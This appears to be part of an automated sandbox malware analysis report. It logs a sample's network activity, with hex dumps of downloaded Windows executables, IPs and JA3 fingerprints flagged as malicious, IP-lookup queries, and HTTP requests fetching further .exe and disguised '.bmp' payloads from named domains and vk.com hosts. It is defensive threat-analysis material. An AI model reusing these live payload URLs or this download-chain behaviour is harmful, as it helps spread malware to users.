00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 d0 0c 0e cb 55 00 20 07 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 d3 2f c5 3a 3c 01 4b b1 7e c9 8a 8a 4d 2f a3 0d d9 7f a6 e3 8c 23 11 53 e0 59 18 c5 75 8a e2 77 f8 b6 94 7f 0c 6a c0 de 74 49 64 e2 e9 5c 53 b2 04 d8 f7 44 0c ab 5f 0d 6d 46 e9 e5 c3 76 88 b7 96 57 ac b6 4d e1 69 1d 6f fb 4b 88 10 6c 42 cb 88 3f 5c 00 8f d0 4e af 26 28 94 71 1f 3d 8f 24 e1 70 9e a7 23 5f ec 28 cb 85 d1 95 98 8a 7e 2a 91 f2 27 75 f7 19 c0 06 98 4d 98 fd d8 af d5 90 0f c4 25 53 f8 f5 91 36 31 05 a5 b0 ee 6f c1 70 4d 47 0c d1 91 11 aa ad 60 1d ba ce b1 27 18 5c 59 86 e9 66 52 58 be e9 76 ac 59 e4 e5 5b 05 08 f9 c7 da ad fc fb 52 2b 74 cd 1e 5b 20 42 f9 dd 53 3d f7 db 10 60 58 bb b2 ca 4e c6 71 27 53 10 be 7a 6d 29 60 69 13 9b 84 fc c4 ff 32 a7 62 ed a9 f1 85 65 80 b2 6a ef e3 f8 d5 5f 36 00 c8 b4 11 a3 ee aa a9 26 3c ba 51 51 28 1e 0f 2e 0d 2f c3 7c 21 b4 d7 10 3a 32 57 50 ca 45 af 4e e2 cb c2 a3 32 50 8b f5 dd 01 f4 53 f8 5e 98 97 03 10 d7 65 0d d7 f6 83 be 6c eb d3 92 53 c4 ef c3 41 a5 24 f4 e9 6a f2 d2 75 99 8c 19 fb 7d
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 May 2024 06:40:20 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Tue, 02 Apr 2024 08:24:20 GMTETag: "ab2000-61518d52a9500"Accept-Ranges: bytesContent-Length: 11214848Content-Type: application/x-msdownloadData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 db 4c 00 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 80 00 00 00 2e ca 00 00 00 00 00 79 fc 01 01 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 a1 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 2e 66 01 64 00 00 00 00 10 a1 01 58 2c 00 00 60 d8 a0 01 fc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 76 fb 00 28 00 00 00 20 d7 a0 01 38 01 00 00 00 00 00 00 00 00 00 00 00 10 f6 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e6 7e 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f0 1d 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 68 e9 c9 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 80 01 00 00 00 a0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 b0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 c0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 30 00 00 e3 34 2b 00 00 d0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 31 00 00 38 08 00 00 00 10 f6 00 00 0a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 32 00 00 5c e3 aa 00 00 20 f6 00 00 e4 aa 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 58 2c 00 00 00 10 a1 01 00 2e 00 00 00 f2 aa 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 May 2024 06:40:23 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12X-Powered-By: PHP/8.2.12Content-Description: File TransferContent-Disposition: attachment; filename=Default12_big.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 5929720Content-Type: application/octet-streamData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 e7 e6 0f 66 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 27 00 34 11 00 00 a6 08 00 00 00 00 00 94 43 cf 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 d2 00 00 02 00 00 10 e0 5a 00 02 00 00 80 00 00 10 00 00 10 03 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 40 cf 00 4c 00 00 00 4c 40 cf 00 48 03 00 00 00 50 cf 00 10 ad 02 00 00 00 00 00 00 00 00 00 00 62 5a 00 f8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4f cf 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 41 cf 00 68 00 00 00 10 a3 c3 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 30 cf 00 00 10 00 00 00 a2 57 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 20 0f 00 00 00 40 cf 00 00 10 00 00 00 a4 57 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 10 ad 02 00 00 50 cf 00 00 ae 02 00 00 b4 57 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 f3 0c 12 a0 57 00 20 07 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 d3 2f c5 3a 3c 01 4b b1 7e c9 8a 8a 4d 2f a3 0d d9 7f a6 e3 8c 23 11 53 e0 59 18 c5 75 8a e2 77 f8 b6 94 7f 0c 6a c0 de 74 49 64 e2 e9 5c 53 b2 04 d8 f7 44 0c ab 5f 0d 6d 46 e9 e5 c3 76 88 b7 96 57 ac b6 4d e1 69 1d 6f fb 4b 88 10 6c 42 cb 88 3f 5c 00 8f d0 4e af 26 28 94 71 1f 3d 8f 24 e1 70 9e a7 23 5f ec 28 cb 85 d1 95 98 8a 7e 2a 91 f2 27 75 f7 19 c0 06 98 4d 98 fd d8 af d5 90 0f c4 25 53 f8 f5 91 36 31 05 a5 b0 ee 6f c1 70 4d 47 0c d1 91 11 aa ad 60 1d ba ce b1 27 18 5c 59 86 e9 66 52 58 be e9 76 ac 59 e4 e5 5b 05 08 f9 c7 da ad fc fb 52 2b 74 cd 1e 5b 20 42 f9 dd 53 3d f7 db 10 60 52 82 1f c5 2e c6 71 27 53 10 be 7a 6d 29 60 69 13 9b 84 fc c4 ff 32 a7 62 ed a9 f1 85 65 80 b2 6a ef e3 f8 d5 5f 36 00 c8 b4 11 a3 ee aa a9 26 3c ba 51 51 28 1e 0f 2e 0d 2f c3 7c 21 b4 d7 10 3a 32 57 50 ca 45 af 4e e2 cb c2 a3 32 50 8b f5 dd 01 f4 53 f8 5e 98 97 03 10 d7 65 0d d7 f6 83 be 6c eb d3 92 53 c4 ef c3 41 a5 24 f4 e9 6a f2 d2 75 99 8c 19 fb 7d
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.0Date: Wed, 01 May 2024 06:40:23 GMTContent-Type: application/octet-streamConnection: closeContent-Description: File TransferContent-Disposition: attachment; filename=aeb24096.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 20 81 e9 50 4e d2 e9 50 4e d2 e9 50 4e d2 2a 5f 11 d2 eb 50 4e d2 e9 50 4f d2 4a 50 4e d2 2a 5f 13 d2 e6 50 4e d2 bd 73 7e d2 e3 50 4e d2 2e 56 48 d2 e8 50 4e d2 52 69 63 68 e9 50 4e d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 63 dc a0 64 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 22 02 00 00 08 00 00 fc 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 03 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 84 00 00 a0 00 00 00 00 a0 03 00 90 18 00 00 00 00 00 00 00 00 00 00 8c 5d 0a 00 98 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 65 00 00 00 10 00 00 00 66 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 58 13 00 00 00 80 00 00 00 14 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fb 01 00 00 a0 00 00 00 06 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 90 18 00 00 00 a0 03 00 00 1a 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 May 2024 06:40:24 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12X-Powered-By: PHP/8.2.12Content-Description: File TransferContent-Disposition: attachment; filename=Space1.9_big.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 5995256Content-Type: application/octet-streamData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 e7 e6 0f 66 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 27 00 34 11 00 00 4a 08 00 00 00 00 00 94 53 d3 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 d5 00 00 02 00 00 f2 3b 5c 00 02 00 00 80 00 00 10 00 00 10 03 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 50 d3 00 4c 00 00 00 4c 50 d3 00 48 03 00 00 00 60 d3 00 04 50 02 00 00 00 00 00 00 00 00 00 00 62 5b 00 f8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5f d3 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 51 d3 00 68 00 00 00 0c 93 87 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 40 d3 00 00 10 00 00 00 fe 58 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 20 0f 00 00 00 50 d3 00 00 10 00 00 00 00 59 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 04 50 02 00 00 60 d3 00 00 52 02 00 00 10 59 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 34 0d fd fc 58 00 20 07 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 d3 2f c5 3a 3c 01 4b b1 7e c9 8a 8a 4d 2f a3 0d d9 7f a6 e3 8c 23 11 53 e0 59 18 c5 75 8a e2 77 f8 b6 94 7f 0c 6a c0 de 74 49 64 e2 e9 5c 53 b2 04 d8 f7 44 0c ab 5f 0d 6d 46 e9 e5 c3 76 88 b7 96 57 ac b6 4d e1 69 1d 6f fb 4b 88 10 6c 42 cb 88 3f 5c 00 8f d0 4e af 26 28 94 71 1f 3d 8f 24 e1 70 9e a7 23 5f ec 28 cb 85 d1 95 98 8a 7e 2a 91 f2 27 75 f7 19 c0 06 98 4d 98 fd d8 af d5 90 0f c4 25 53 f8 f5 91 36 31 05 a5 b0 ee 6f c1 70 4d 47 0c d1 91 11 aa ad 60 1d ba ce b1 27 18 5c 59 86 e9 66 52 58 be e9 76 ac 59 e4 e5 5b 05 08 f9 c7 da ad fc fb 52 2b 74 cd 1e 5b 20 42 f9 dd 53 3d f7 db 10 60 53 21 8a b5 ce c6 71 27 53 10 be 7a 6d 29 60 69 13 9b 84 fc c4 ff 32 a7 62 ed a9 f1 85 65 80 b2 6a ef e3 f8 d5 5f 36 00 c8 b4 11 a3 ee aa a9 26 3c ba 51 51 28 1e 0f 2e 0d 2f c3 7c 21 b4 d7 10 3a 32 57 50 ca 45 af 4e e2 cb c2 a3 32 50 8b f5 dd 01 f4 53 f8 5e 98 97 03 10 d7 65 0d d7 f6 83 be 6f 69 5e 1e 6b 44 e5 9d ec 7c a4 57 6a 58 55 b9 96 08 4d 4e e4 01

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199680449169 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 193.233.132.139 193.233.132.139
Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 37.221.125.202 37.221.125.202

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: PTSERVIDORPT PTSERVIDORPT

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: api.myip.com
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: iplogger.org
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: api.myip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/149.18.24.96 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: HEAD /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sextipolar.sbsConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: zanzibarpivo.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: triedchicken.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /style/060.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: dod.fastbutters.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /038bcf3a84a6c65c7cd47ac3b64b7f9b/7725eaa6592c80f8124e769b4e8a07f7.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cheremushki.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /038bcf3a84a6c65c7cd47ac3b64b7f9b/cad54ba5b01423b1af8ec10ab5719d97.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: carthewasher.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qwqw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sextipolar.sbsConnection: Keep-AliveCookie: _subid=2aviuam2b4oin; 3c8e6=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMwMFwiOjE3MTQ1NDU2MjF9LFwiY2FtcGFpZ25zXCI6e1wiMjVcIjoxNzE0NTQ1NjIxfSxcInRpbWVcIjoxNzE0NTQ1NjIxfSJ9.CqbM3pEsvxuFlcasa8wVpwytEIdy4QAkgAWzI6-JAZE
Source: global traffic	HTTP traffic detected: GET /525403/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: monoblocked.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /525403/setup.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: f.123654987.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc5294803_668776833?hash=0O6PF91bZH66jRdVdr0Yhs0vV73FDPMFrSckqwaaZuH&dl=PH90vp0b08GcZph4ge7Tw9b9Uj3c1wFnC01nFynmnNL&api=1&no_preview=1#ww11 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc5294803_669146636?hash=oOxNOsTOdJPrmnDMbC1WPJr0rvKjkZ1hobtPAeSmhS0&dl=r9dUuCDHeIUqlREMZideAXmDqLSX2CxI5qdKmkcx3po&api=1&no_preview=1#cap HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc5294803_668917518?hash=HcqSqB4BEz69zZduDzHpG5p3oDuUGmC4h5HdrueZTFD&dl=73Wmq1mPcIfGe320FelzdYt7foFKatzHUAXVPKOvEz0&api=1&no_preview=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c909328/u5294803/docs/d50/141d7a9868fe/grwg_20240501083043.bmp?extra=LlcaPpnlc3Nm2YJa_HIxTuy8pxFR3cOfTp20BZVPqWbia3-pjLZINmv48VErXBJArrURXJc9wcRab86W2hl73jhKe_zRspSlR2tyoxWE2filhre49hjiCvIckuUXGOOQUBkTv6pEvBQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc5294803_669132669?hash=ZKjz6ih7UQ9lzkD21VhcvrQwcwdE4E0ZYGiugVcv47k&dl=WempMPmw6ufkYnUzfTIoLDfW8XiZgAu8J2F0VsJ9NwT&api=1&no_preview=1#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /doc5294803_669123201?hash=XDCpjElzxewo4KzTOHuQEMVCKwzlHqQzBJyb5YKd2Jc&dl=cOyLY32AZWRaWIUaV6LVF1KVnbsjSHxC1w6esY9lvXc&api=1&no_preview=1#mene HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c237031/u5294803/docs/d48/faa96ddc856f/BotClient_make.bmp?extra=-QkfenqPxrvYtmrTIqBQ0mVeqEu8ubnNU1NG8tGGtw3-QFsDYjvYp64yJnpB_OcMg0uhKlG1RASme310Qax8_egiLSt12hVPF9Wl3DN6qYLOxmECHbAL6mz2NgJ9qEZNdnWZ6unUcjI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc5294803_669074803?hash=gtxjyDdukAIKxlWY09AIJPG5gj5TRTjhoVyhzgbP72o&dl=A9s6LaMpuQCyacGXT0hxzf0MvaBJbV8eIlyefAe3TSw&api=1&no_preview=1#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c909218/u5294803/docs/d8/57e1b3af3092/crypted.bmp?extra=Gxkm1-qUj4gTylzhygF0ymDxXHL811_5cKi0pGRSmNbB8xbMKVlvz1Dj_tciMVuEusahBVGi1kGq7gOCAviXVpJzhtwg5lCSO-f5sXIwePQ4Q0UjpInqDSzvgoI_tCv82d6g6aUD97c HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-22.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /c236331/u5294803/docs/d47/5d64691d2964/crypted.bmp?extra=kGc4Kw6r3KNmnJcNsZNoeqzxsyU48VGtKMsa8v9e4LEHURc7u4wFMmsoHQSLycKdnKbLmB8U76u1qw4WomWhiyKAlTZiZ2p3djsH9911hBclkSW3TQfktfGI1iuTmpkRbaERsG2JfXY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Cache-Control: no-cacheHost: sun6-20.userapi.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /doc329118071_676158749?hash=wJqTXfnxe0acmwC4vumRgawHgxCuE6EviXjICmkirIT&dl=YVEMDGiurKsySjR8YhvL7Ks3RZIJ4qJjfFMeqQgdrQ8&api=1&no_preview=1#ww12 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Host: vk.comCache-Control: no-cache
